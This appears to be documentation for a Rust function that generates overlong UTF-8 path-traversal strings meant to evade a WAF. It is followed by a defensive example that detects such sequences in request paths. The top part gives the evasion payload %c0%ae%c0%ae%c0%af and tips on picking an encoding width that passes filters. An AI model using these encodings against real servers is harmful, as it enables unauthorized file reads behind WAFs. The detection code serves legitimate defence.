pub fn overlong_utf8_path(path: &str, width: u8) -> String
Overlong UTF-8 encoding of . and / for path traversal.
CRS GitHub issue #4189 (opened 2025-07, still open) — CRS does
not alert on %c0%ae%c0%ae%c0%af (../ in 2-byte overlong UTF-8).
Servers that strictly decode UTF-8 reject these as malformed; older
JVMs, some C libs (CVE-2017-9805 Struts2), and a non-trivial set
of internal services accept them. WAF gap + permissive backend =
path traversal that the WAF doesn’t see.
width selects the overlong representation: 2 (default), 3, or 4
bytes. Some decoders check each width independently, so a 3-byte
overlong may pass where the 2-byte form is filtered.
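The defender's side of the gap described above, as an added example that is not code from this crate: a strict check that percent-decodes a request path and reports the first overlong UTF-8 sequence, which is the rule a gateway or WAF would need. Rust's own std::str::from_utf8 already rejects such bytes, so only lenient backends are at risk.

```rust
// Added example, not code from the documented crate: the defender's check.
// Percent-decode a request path to raw bytes and report the first overlong
// UTF-8 sequence, which strict decoders (Rust's std::str::from_utf8 included)
// reject but a lenient backend may happily decode as "../".

fn hex_val(b: u8) -> Option<u8> { (b as char).to_digit(16).map(|d| d as u8) }

/// Decode %XX escapes to raw bytes with no UTF-8 validation at all.
fn percent_decode(path: &str) -> Vec<u8> {
    let src = path.as_bytes();
    let mut out = Vec::with_capacity(src.len());
    let mut i = 0;
    while i < src.len() {
        if src[i] == b'%' && i + 2 < src.len() {
            if let (Some(h), Some(l)) = (hex_val(src[i + 1]), hex_val(src[i + 2])) {
                out.push(h << 4 | l);
                i += 3;
                continue;
            }
        }
        out.push(src[i]);
        i += 1;
    }
    out
}

/// Offset of the first overlong sequence: the lead byte announces a 2-, 3- or
/// 4-byte form but the decoded code point is below that form's minimum
/// (C0 AE decodes to U+002E '.', which may only be encoded as the byte 0x2E).
fn first_overlong(bytes: &[u8]) -> Option<usize> {
    let mut i = 0;
    while i < bytes.len() {
        let (len, min) = match bytes[i] {
            0xC0..=0xDF => (2, 0x80),
            0xE0..=0xEF => (3, 0x800),
            0xF0..=0xF7 => (4, 0x10000),
            _ => { i += 1; continue; } // ASCII, stray continuation or invalid lead
        };
        let tail = match bytes.get(i + 1..i + len) {
            Some(t) if t.iter().all(|c| (c & 0xC0) == 0x80) => t,
            _ => { i += 1; continue; } // truncated or malformed: not decodable anyway
        };
        let mut cp = (bytes[i] & (0x7F >> len)) as u32;
        for c in tail { cp = cp << 6 | (c & 0x3F) as u32; }
        if cp < min { return Some(i); }
        i += len;
    }
    None
}

/// Gateway rule: true when the path carries any overlong sequence.
pub fn path_has_overlong_utf8(path: &str) -> bool {
    first_overlong(&percent_decode(path)).is_some()
}
```

The sample path in the test below uses the %c0%ae%c0%ae%c0%af sequence from the issue above; a valid 2-byte character such as é (%c3%a9) must not trigger the rule.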